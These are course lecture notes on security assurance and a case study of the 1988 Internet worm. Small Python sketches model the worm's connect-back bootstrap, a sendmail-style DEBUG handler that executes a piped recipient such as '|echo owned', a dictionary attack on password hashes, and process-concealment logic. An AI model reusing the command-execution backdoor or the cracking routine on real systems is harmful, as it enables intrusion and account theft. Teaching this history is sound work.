Real Security and the Internet Worm

CS 513 -- System Security -- January 27, 1998 -- Lecture 3
Lecturer: Professor Fred B. Schneider

Lecture notes by Lynette I. Millett

For those planning to participate in the optional project annex: group membership declarations are due today at noon.
Homework 1 is due Thursday, and should be done in groups of 2 or 3.

Further Reading:
For a discussion of the internet worm described in today's lecture see: Communications of the ACM (CACM) Vol. 32, No. 6, June 1989.

In the last lecture we discussed the gold (Au) standard for security: authentication, authorization, and audit. We now ask: What are good strategies for defense? How can we make sure that attacks won't succeed? There are four strategies we might consider:

1. Isolate the system so that attackers cannot reach it at all.
2. Keep the bad guys out.
3. Let the bad guys in, but prevent them from doing harm.
4. Catch the bad guys after the fact and prosecute them.

The latter three strategies require being able to distinguish the bad guys from the good guys, and that means some sort of authentication process. Keeping the bad guys out requires having a list of the good guys. Letting the bad guys in but preventing them from doing harm requires not only a list of the good guys, but an authorization mechanism as well.

Authorization can be done at many levels of the system. For example, read/write/execute privileges in a UNIX system are enforced at the file level; authorization could also be done at the level of fields in data records. The closer the mechanism sits to the application level, the more precisely it can authorize exactly what is required, but its success then becomes application dependent. At a lower level, authorization is likely to be simpler, and the less complex such facilities are, the fewer bugs they will have. Thus lower-level authorization can provide higher assurance. This is a classic trade-off: functionality vs. assurance.

The fourth option above depends heavily on audit facilities that cannot be subverted by the bad guys. Thus, audit requires authorization.
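The distinction between authentication and authorization can be made concrete with a small sketch. All users, files, and permissions below are invented; this is a minimal model of UNIX-style file-level access checks, not any real system's mechanism:

```python
# A minimal model (hypothetical data) of file-level authorization:
# authentication yields an identity from the list of "good guys", and an
# access-control table decides what that identity may do to each file.

KNOWN_USERS = {"alice", "bob"}  # the list of the good guys

# (file, user) -> set of operations that user may perform on that file
ACL = {
    ("notes.txt", "alice"): {"read", "write"},
    ("notes.txt", "bob"): {"read"},
}

def check_access(user: str, filename: str, op: str) -> bool:
    """Authenticate the user, then authorize the requested operation."""
    if user not in KNOWN_USERS:       # keep the bad guys out
        return False
    return op in ACL.get((filename, user), set())

print(check_access("alice", "notes.txt", "write"))   # True
print(check_access("bob", "notes.txt", "write"))     # False
print(check_access("mallory", "notes.txt", "read"))  # False
```

Note how coarse the granularity is: the table speaks of whole files, not of fields within them, which is exactly the functionality-vs-assurance trade-off described above.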


The issue of assurance brings up a whole family of issues. It is not enough that a system be secure or trustworthy. It must be demonstrably so. Before a system can be trusted, it is necessary to convince people that it satisfies the security requirements. The question becomes: What do you know and how do you know it? There are several ways to answer this question. One weak answer is to claim that the system has been debugged thoroughly. Another is to note that the system has been deployed and tested extensively. Yet a third may be to point to an agency, like NSA, that has approved it. (The latter may not provide as much of a security guarantee as one would hope.)

In general, the two strongest methods used to increase assurance are extensive testing by outside groups and mathematical proof. Mathematical proofs can be very long and involved even for small programs, and thus are not likely to be feasible for large, complicated systems.

The question of assurance is also related to an engineering question. If a system is designed to have the fewest critical components, then testing those components thoroughly can be a lower-cost way to increase assurance than testing the entire system.

Recall also that assuring security requirements is difficult because of their lack of specificity; assurance of functional requirements is easier to demonstrate. In fact, systems can be located on a graph whose axes are functionality and assurance.

An application such as Microsoft Word is likely in the danger zone. It has high functionality and lots of bugs. On the other extreme are simpler mechanisms that have a high degree of assurance, such as the kernel. System designers must decide where they want their products to be on the functionality-assurance graph, and also how to convey such information to their customers.

Case Study: The Internet Worm

We have completed an overview of security and security issues. The next topic we discuss will be access control. Before that, however, it seems sensible to examine a real-world example in detail. At a minimum, this ought to provide some real perspective on security. We discuss a series of attacks that occurred in November 1988. The full details are available in CACM. (See Further Reading at the top of this page.)

In 1988 a "worm" was unleashed on the Internet. This worm infected Sun-3 and VAX machines running 4.2 BSD UNIX. The worm was written by Robert Morris, at the time a first-year Computer Science Ph.D. student at Cornell. In 1990 he was convicted under the 1986 Computer Fraud and Abuse Act; he was ordered to pay a $10,000 fine and was sentenced to 3 years of probation and 400 hours of community service. He was also expelled from Cornell, and his subsequent re-admission attempt failed. It should be noted that under the 1986 Act, malice is not necessary for conviction; a misguided experiment is sufficient. The worm's effect was to cause infected systems to become more and more loaded with processes, using up resources such as swap space and the process table until the machine eventually crashed.

Definitions: worm vs. virus.

A worm is a self-contained program that propagates copies of itself across a network; a virus attaches itself to other programs and replicates when they run. Both of these terms originated in the science fiction literature: John Brunner first used the term worm in "The Shockwave Rider" (1975), and David Gerrold suggested the term virus in "When HARLIE Was One" (1972).

How the Worm Operated

There were two basic parts to the Internet worm: a main program and a bootstrap (or vector) program. The main program collected information from the host on which it was running and used that information to determine which other machines on the network it could reach. The worm then exploited vulnerabilities in the UNIX operating system to get the bootstrap program running on those machines.
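One concrete piece of that information gathering: the worm read files such as /etc/hosts.equiv and users' .rhosts files, which list hosts trusted for remote login. The sketch below parses that simple format; the file contents and host names are hypothetical:

```python
# A sketch of the main program's target gathering: extract candidate
# machines from hosts.equiv/.rhosts-style trust files. The sample file
# contents and host names below are invented.

def parse_trusted_hosts(text: str) -> set[str]:
    """Collect host names from hosts.equiv/.rhosts-style lines."""
    hosts = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue                   # skip blanks and comments
        hosts.add(line.split()[0])     # first field is the host name
    return hosts

hosts_equiv = """\
# machines we trust
garcia.cs.cornell.edu
selena.cs.cornell.edu  guest
"""

print(sorted(parse_trusted_hosts(hosts_equiv)))
# ['garcia.cs.cornell.edu', 'selena.cs.cornell.edu']
```

Each host found this way was a promising target precisely because trust between machines was often mutual.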

The bootstrap program consisted of 99 lines of C code. It was compiled and run on each remote machine, which allowed the worm to exploit the fact that most machines could compile C, rather than needing to distribute machine code for every possible machine/operating system configuration. This monoculture (all machines "understanding" C and UNIX) made for much easier penetration, and it raises intriguing questions about the spread of languages like Java, which also promote a monoculture. The bootstrap program took three command-line arguments: the network address of the infecting machine, the network port on that machine from which to fetch copies of the main worm files, and a "magic number" used as a one-time challenge password.

Once running, the bootstrap connected back to the infecting machine on the given port, presented the magic number as its one-time password, copied over the main worm files, and then ran the main program on the newly infected host.
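The connect-back step can be sketched as follows. Everything here is illustrative: the names, the wire format, and the magic value are invented, and the real vector was 99 lines of C, not Python. The sketch runs a toy stand-in for the infecting machine's file server on the loopback interface:

```python
# Hypothetical sketch of the vector's connect-back: open a TCP connection
# to the infecting machine, present the one-time "magic number", and pull
# down the main worm files.
import socket
import threading

MAGIC = "8712440"   # stand-in value; the real worm generated its own

srv = socket.socket()
srv.bind(("127.0.0.1", 0))   # toy stand-in for the infecting machine
srv.listen(1)
port = srv.getsockname()[1]

def serve_once(payload: bytes) -> None:
    """Hand over the files only if the magic number checks out."""
    conn, _ = srv.accept()
    if conn.recv(64).strip().decode() == MAGIC:
        conn.sendall(payload)
    conn.close()

def bootstrap(host: str, port: int, magic: str) -> bytes:
    """The vector's job: connect back, authenticate, fetch the payload."""
    with socket.create_connection((host, port)) as sock:
        sock.sendall((magic + "\n").encode())
        chunks = []
        while chunk := sock.recv(4096):
            chunks.append(chunk)
        return b"".join(chunks)

t = threading.Thread(target=serve_once, args=(b"main worm files",))
t.start()
payload = bootstrap("127.0.0.1", port, MAGIC)
t.join()
print(payload)  # b'main worm files'
```

The magic number gave the worm a crude defense of its own: a curious administrator who found the vector could not simply replay it to download the main program without the right challenge value.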

Note that the real challenge here is getting the bootstrap (vector) installed and running. The Internet worm exploited four well-known vulnerabilities in UNIX to install the bootstrap program:

1. sendmail: when compiled with the DEBUG option (as it commonly was), sendmail would accept a command pipeline in place of a recipient address, giving remote command execution.
2. fingerd: the finger daemon read its input with gets(), which performs no bounds checking; an over-long request overflowed a fixed-size buffer and let the worm run code of its choosing.
3. rsh/rexec: remote-shell facilities based on trusted-host files (/etc/hosts.equiv, .rhosts) let the worm run commands on machines that trusted an already-infected host.
4. Passwords: accounts whose passwords could be guessed (see below) gave the worm ordinary user access on other machines.
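To show the flavor of one such hole, the toy message handler below mimics a sendmail-style DEBUG backdoor: a leftover debugging feature in a privileged service that turns a recipient field into remote command execution. It is an invented miniature, not real sendmail or its protocol:

```python
# Toy illustration (not real sendmail) of the DEBUG backdoor pattern: a
# service with a debugging feature left enabled in the field, where a
# recipient beginning with "|" is executed as a shell pipeline.
import subprocess

def handle_session(commands: list[str]) -> list[str]:
    debug = False
    output = []
    for line in commands:
        if line == "DEBUG":
            debug = True                  # the backdoor switch
        elif line.startswith("RCPT TO:"):
            rcpt = line[len("RCPT TO:"):].strip()
            if debug and rcpt.startswith("|"):
                # recipient is run as a command: remote code execution
                out = subprocess.run(rcpt[1:], shell=True,
                                     capture_output=True, text=True)
                output.append(out.stdout.strip())
            else:
                output.append(f"queued mail for {rcpt}")
    return output

print(handle_session(["RCPT TO: alice"]))
# ['queued mail for alice']
print(handle_session(["DEBUG", "RCPT TO: |echo owned"]))
# ['owned']
```

The point is not the specific commands but the pattern: a privileged service shipped with more functionality than its operators knew about.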

Once a remote machine had been infected, the worm needed to guess passwords for local accounts. On UNIX, the file /etc/passwd stores encrypted versions of user passwords, so a brute-force dictionary attack is possible: the worm took a list of words, encrypted each one, and compared the result to the encrypted passwords in /etc/passwd. Specifically, the worm first checked an internal list of 432 commonly-used passwords (discovered empirically before deployment of the worm). Then more attempts were made using the UNIX on-line dictionary. Some sites reported that up to 50% of their passwords were cracked using this approach.
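The attack logic can be sketched as follows. SHA-256 stands in for the historical salted DES-based crypt() so the example is self-contained, and all accounts, salts, and candidate words are invented; what matters is the structure: hash each guess and compare, never decrypt:

```python
# Sketch of the worm's dictionary attack against /etc/passwd-style
# entries. SHA-256 is a stand-in for the DES-based crypt() of the era;
# users, salts, and passwords here are hypothetical.
import hashlib

def crypt_stub(word: str, salt: str) -> str:
    """Stand-in for UNIX crypt(): one-way hash of salt + password."""
    return hashlib.sha256((salt + word).encode()).hexdigest()

# user -> (salt, stored hash), as a password file would hold them
passwd = {
    "alice": ("ab", crypt_stub("wizard", "ab")),    # a weak password
    "bob":   ("cd", crypt_stub("x9$!qLm2", "cd")),  # a strong one
}

# the worm carried 432 such words, then fell back to the on-line dictionary
wordlist = ["password", "wizard", "cornell", "aaa"]

def crack(passwd: dict, wordlist: list[str]) -> dict:
    cracked = {}
    for user, (salt, stored) in passwd.items():
        for word in wordlist:
            if crypt_stub(word, salt) == stored:
                cracked[user] = word
    return cracked

print(crack(passwd, wordlist))  # {'alice': 'wizard'}
```

Notice that the stored hashes are never inverted; weak passwords fall simply because they appear on a short list of likely guesses.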

During execution of the main loop, the worm checked for other worms running on the same machine. This was done by connecting to host port 11357 using UDP. If it succeeded, the worm would set an internal value that would cause it to halt. However, one out of seven worms did not check for others and thus became "immortal." This was the primary cause of machines being overloaded.
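A simple approximation of the duplicate check: rather than reproducing the worm's actual UDP exchange, this sketch just tries to bind the rendezvous port locally and treats a failure to bind as evidence that another copy is running. The function and its interface are invented:

```python
# Sketch of the worm's "am I alone on this machine?" check, with the
# 1-in-7 immortality modeled by a flag the caller sets randomly.
import socket

CHECK_PORT = 11357  # the rendezvous port, per the lecture

def should_halt(skip_check: bool = False) -> bool:
    """Return True if another copy already holds the port.

    skip_check=True models the one-in-seven worms that never checked
    for siblings and so became "immortal".
    """
    if skip_check:
        return False
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        probe.bind(("127.0.0.1", CHECK_PORT))  # first worm claims the port
    except OSError:
        return True     # port already taken: another worm is running
    probe.close()        # a real worm would hold the socket for life
    return False

# caller decides: skip_check=(random.randrange(7) == 0)
print(should_halt())  # False when no other copy holds the port
```

The one-in-seven exemption was presumably meant to defeat administrators who might fake the check to inoculate machines; its side effect was the runaway process load that made the worm so visible.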

In order to conceal itself, the worm would occasionally fork itself and kill the parent. This had the effect that no single process accumulated an excessive amount of CPU time, and it ensured that the UNIX scheduler would not re-prioritize ("nice") the worm's process because of how long it had been running. Also, if the worm had been present on a machine for more than 12 hours, it would flush its list of infected machines and start over.
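The camouflage bookkeeping can be modeled as a small state machine. The re-fork interval below is invented for illustration (only the 12-hour flush figure comes from the lecture), and time is passed in explicitly rather than read from the clock so the logic is easy to follow:

```python
# Sketch of the worm's self-concealment bookkeeping: re-fork before any
# one process accumulates CPU time, and flush the infected-hosts list
# every 12 hours. The 10-minute re-fork interval is hypothetical.

REFORK_AFTER = 10 * 60       # seconds per process incarnation (invented)
FLUSH_AFTER = 12 * 60 * 60   # 12 hours, per the worm's behavior

class WormState:
    def __init__(self, now: float):
        self.process_start = now   # when this incarnation was forked
        self.epoch_start = now     # when the infection list was last reset
        self.infected = set()

    def tick(self, now: float) -> str:
        if now - self.epoch_start >= FLUSH_AFTER:
            self.infected.clear()      # forget past infections; start over
            self.epoch_start = now
            return "flush"
        if now - self.process_start >= REFORK_AFTER:
            # real worm: fork(), parent exits, child continues with a
            # fresh PID and zero accumulated CPU time
            self.process_start = now
            return "refork"
        return "run"

w = WormState(0)
w.infected.add("garcia")
print(w.tick(100))     # run
print(w.tick(601))     # refork
print(w.tick(43200))   # flush
```

The repeated change of process identity also frustrated administrators trying to watch any one suspicious process.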

It is useful to consider, from a more abstract perspective, why the Internet worm succeeded. What were the vulnerabilities that the worm exploited?

1. A monoculture: nearly every machine ran UNIX and could compile C, so a single attack worked everywhere.
2. Privileged services with more authority than they needed, containing bugs (the fingerd buffer overflow) or leftover debugging features (sendmail's DEBUG mode).
3. Trust relationships between machines, so that compromising one host gave access to every host that trusted it.
4. Guessable, reusable passwords.

The above problems are not atypical. Today it is not subtle technical issues that cause the vulnerabilities being exploited; rather, it is design decisions and user practices.